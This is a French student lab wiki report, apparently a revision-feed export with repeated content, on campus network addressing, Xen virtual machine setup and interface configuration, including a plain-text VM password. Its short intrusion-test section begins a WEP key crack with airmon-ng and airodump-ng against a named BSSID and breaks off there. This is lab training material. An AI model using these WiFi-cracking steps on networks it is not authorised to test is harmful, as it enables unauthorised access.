| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 !vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 lsblk&lt;br /&gt;
 xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.188&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 !iface eth0 inet6 auto &lt;br /&gt;
&lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec CTRL + [&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Lancement de la capture des paquets :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlx40a5ef012de1&lt;br /&gt;
&lt;br /&gt;
BSSID choisi :&lt;br /&gt;
&lt;br /&gt;
 44:AD:D9:5F:87:09 =&amp;gt; kracotte10&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56272</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=56272"/>
				<updated>2021-10-25T15:30:32Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 01 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu1,xvda3,w',&lt;br /&gt;
 ! 		  'phy:/dev/storage/Paixdieu2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 !vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 !/dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 !/dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 !lsblk&lt;br /&gt;
 xvda3 202:3 0 10G 0 disk /home&lt;br /&gt;
 xvda4 202:4 0 10G 0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
 &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
